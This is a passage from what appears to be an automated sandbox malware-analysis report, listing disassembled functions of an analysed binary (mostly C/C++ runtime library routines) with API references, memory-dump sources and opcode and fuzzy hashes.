                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4267394785-0
                                                                                                                                                                                                                      • Opcode ID: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
                                                                                                                                                                                                                      • Instruction ID: 2f3174b6460024395a64a48f72e5d6295df67857de25ab22e7a2358828d9e838
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE219276E081079ACB34CEA8D9999ED7BB29F04303F54516AA801D7A4AD7319A498610
                                                                                                                                                                                                                      Function 0065B1DF Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4267394785-0
                                                                                                                                                                                                                      • Opcode ID: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
                                                                                                                                                                                                                      • Instruction ID: 8f56352188cd664dea6cfba31b8e725395449245a2a579d79640e84ecb3fda7d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F21C376E0810B9ACF38CEB8D9999FD7BF29F04303F58516AAC01D7A4AD7309B498710
                                                                                                                                                                                                                      Function 0061A0DA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0061A0D1,006182EB,006179A2), ref: 0061A0E8
                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0061A0F6
                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0061A10F
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,0061A0D1,006182EB,006179A2), ref: 0061A161
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                      • Opcode ID: 5dddc541cb11e66060535fa4ded1e0e263f2744cdbd4577bbbbb53facd491007
                                                                                                                                                                                                                      • Instruction ID: ad1388923d665d5b074e3b694dbca2c79a4bd76d616dda35679a5334fa22f6dc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dddc541cb11e66060535fa4ded1e0e263f2744cdbd4577bbbbb53facd491007
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8701283220E7516DE72516F47C877EA2667EB01374B28522DF420822E1EF524C865196
                                                                                                                                                                                                                      Function 0065FE83 Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __lock_free$___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1181530324-0
                                                                                                                                                                                                                      • Opcode ID: 4511dd32679ad0c4380a56cd15437f1e7d465bfd809d09fc7d2e8514abba8716
                                                                                                                                                                                                                      • Instruction ID: f396677d863b3ebc012d48f4037fb526e97cbcf3f9b670916718dd233ed886ac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4511dd32679ad0c4380a56cd15437f1e7d465bfd809d09fc7d2e8514abba8716
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D611C231501704BADB70AF64A40F75E73EA9F00713F20892EFC95972E2DF74DA888A59
                                                                                                                                                                                                                      Function 0061A1F1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 1740715915-1810561636
                                                                                                                                                                                                                      • Opcode ID: 3d7cb76753f57e6504838f0d45254d60080cf8ffdbaa01e3a6b18905d90e843b
                                                                                                                                                                                                                      • Instruction ID: 17e4e12d9f534ee08bcabf9e654b54e35868e091858bacff7982722d3acbc026
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d7cb76753f57e6504838f0d45254d60080cf8ffdbaa01e3a6b18905d90e843b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8518F71A06602AFDB298F94D841BFA77A6EF44710F1C452DE815C7291D731EDC2CB92
                                                                                                                                                                                                                      Function 0064CBA0 Relevance: 7.8, APIs: 5, Instructions: 297COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2583058844-0
                                                                                                                                                                                                                      • Opcode ID: a8baf6e324238b6fa670bdbabc68fcc09202af3d055b29707fb2316cb4a2f1bb
                                                                                                                                                                                                                      • Instruction ID: 8a5064b4683ddbe3fe5cf54154efd7809cb74cdc97dd1ebd03cdbc77875b44ea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8baf6e324238b6fa670bdbabc68fcc09202af3d055b29707fb2316cb4a2f1bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26C138B1D0021AABCF61EF64DC85AEE77BEAF08311F0140A5FA09A3250DB359F858F55
                                                                                                                                                                                                                      Function 00625CE6 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00625D6D
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00625E2E
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00625E95
                                                                                                                                                                                                                        • Part of subcall function 00624DB8: HeapAlloc.KERNEL32(00000000,00000000,?,?,00617AD5,?,?,?,?,?,0061119C,?,00000001), ref: 00624DEA
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00625EAA
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00625EBA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1096550386-0
                                                                                                                                                                                                                      • Opcode ID: 7256033170ac0b54a68143e15b084ddc7677b459dc46230bfafeb7ac8434356d
                                                                                                                                                                                                                      • Instruction ID: dc9a2d87a86fd91fa456fcd270cfac77867f3a700e964e4b8afc7c7302f6ae43
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7256033170ac0b54a68143e15b084ddc7677b459dc46230bfafeb7ac8434356d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1251C172600E26AFEB355FA4EC45DFB36ABEF44314B1A4529FC06D6250EB30CD508BA4
                                                                                                                                                                                                                      Function 0065C9EF Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3132042578-0
                                                                                                                                                                                                                      • Opcode ID: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
                                                                                                                                                                                                                      • Instruction ID: 354e2139a803f6ce2d5a5ece590c6244601d65d26d248b0fa11094f945616f84
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE315735D003549EDB22AB79EC49A5A3FA6AF44B62F10163AE810D32B1DFB4C484CF4C
                                                                                                                                                                                                                      Function 006578FC Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 168861036-0
                                                                                                                                                                                                                      • Opcode ID: 3aa0acc439a82f8bd65084423e96e0a9ca118dedd833d16da9c95a53395b9bdd
                                                                                                                                                                                                                      • Instruction ID: bc47c0e10d913fb69c24ae147ac7fff6e7b448c4f1de2cc948e2ac6c89cffa8a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3aa0acc439a82f8bd65084423e96e0a9ca118dedd833d16da9c95a53395b9bdd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A019634604209AFCF04EF64EC46EED7BB6EF44706F504069FD019B291EA70EA49C798
                                                                                                                                                                                                                      Function 00613674 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00613680
                                                                                                                                                                                                                      • int.LIBCPMT ref: 00613693
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::_Lockit.LIBCPMT ref: 006116BB
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::~_Lockit.LIBCPMT ref: 006116D5
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 006136C6
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 006136DC
                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 006136E7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                                                                      • Opcode ID: 3872c011aa38eba116a807c1ac4ee4ca457e0219e41c4698e79accbcaf0f3145
                                                                                                                                                                                                                      • Instruction ID: 261172cc6d4662e7e8c5f0bd45a430b44118b2d96a18d8d1113d4ab4d8c88969
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3872c011aa38eba116a807c1ac4ee4ca457e0219e41c4698e79accbcaf0f3145
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD01A272900124BBCB14ABA4D8198ED77ABDF817A0B28015DF503AB390EA359F81C7D9
                                                                                                                                                                                                                      Function 00612B42 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00612B4E
                                                                                                                                                                                                                      • int.LIBCPMT ref: 00612B61
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::_Lockit.LIBCPMT ref: 006116BB
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::~_Lockit.LIBCPMT ref: 006116D5
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00612B94
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00612BAA
                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00612BB5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                                                                      • Opcode ID: e155ced75c498fc5aa2cb1a4c93379ef073b98ad029a4f30683b7a56ba0a4274
                                                                                                                                                                                                                      • Instruction ID: 1835bbca2873f2bb8dacc72d7ae319fd049153d40a7e7a5f172f62e0ff6bbd8a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e155ced75c498fc5aa2cb1a4c93379ef073b98ad029a4f30683b7a56ba0a4274
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68012B32504124ABCB14AF54D8558ED77AFDF81760B18014DF512AB391EF309E81C7C4
                                                                                                                                                                                                                      Function 0065FE8E Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0065FE9A
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __getptd_noexit.LIBCMT ref: 0065C82F
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __amsg_exit.LIBCMT ref: 0065C83C
                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0065FEA5
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0065FEDB
                                                                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 0065FEE7
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0065FEFB
                                                                                                                                                                                                                        • Part of subcall function 0065B9CC: __getptd_noexit.LIBCMT ref: 0065B9CC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2820776222-0
                                                                                                                                                                                                                      • Opcode ID: aea005d457412dc083991dfd3762a1a28235d87295d550c9b816c447a2a8411b
                                                                                                                                                                                                                      • Instruction ID: 4ebc10d292fad0fe9aaa8d936057c4f49ea910b850c2c54b3a7488f7cf2c4680
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aea005d457412dc083991dfd3762a1a28235d87295d550c9b816c447a2a8411b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E601DF71541B01EEEBA0BFB4D907B0C7BA2AF04722F20421DFC519B2D2CB7559498B9D
                                                                                                                                                                                                                      Function 0065E5F1 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0065E5FD
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __getptd_noexit.LIBCMT ref: 0065C82F
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __amsg_exit.LIBCMT ref: 0065C83C
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0065E614
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 0065E622
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0065E632
                                                                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0065E646
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
